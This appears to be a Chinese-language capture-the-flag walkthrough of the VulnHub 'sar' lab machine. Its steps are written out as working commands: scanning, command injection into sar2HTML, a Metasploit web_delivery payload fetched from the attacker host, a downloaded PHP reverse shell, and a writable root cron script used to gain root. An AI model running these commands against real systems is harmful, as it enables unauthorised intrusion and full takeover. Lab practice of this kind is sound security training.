今天实践的是vulnhub的sar镜像,
下载地址,https://download.vulnhub.com/sar/sar.zip,
用virtualbox导入成功,
做地址扫描,sudo netdiscover -r 192.168.0.0/24,
获取到靶机地址192.168.0.186,
继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.186,
有web服务,做一下目录暴破,dirb http://192.168.0.186,
浏览器访问http://192.168.0.186/robots.txt,
浏览器访问http://192.168.0.186/sar2HTML,
搜索sar2html Ver 3.2.1的漏洞利用方法,
验证一下,http://192.168.0.186/sar2HTML/index.php?plot=;tail "/etc/passwd",
kali攻击机上构建攻击脚本,
use /exploit/multi/script/web_delivery
set target 1
set lhost 192.168.0.185
set payload php/meterpreter/reverse_tcp
exploit
浏览器访问http://192.168.0.186/sar2HTML/index.php?plot=;php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.0.185:8080/wpTl1KrB1sb', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));",
获取到shell,查看定时任务,cat /etc/crontab,
最后找到write.sh是root权限,而且当前用户可写,
kali攻击机上制作反弹shell脚本,
cp /usr/share/webshells/php/php-reverse-shell.php shell.php,
靶机上下载反弹shell脚本,
wget http://192.168.0.185:8000/shell.php,
向write.sh写入命令,echo "php ./shell.php" >> write.sh,
kali攻击机上开启反弹shell监听,nc -lvp 1234,
获取到反弹shell,id确认是root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之sar的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论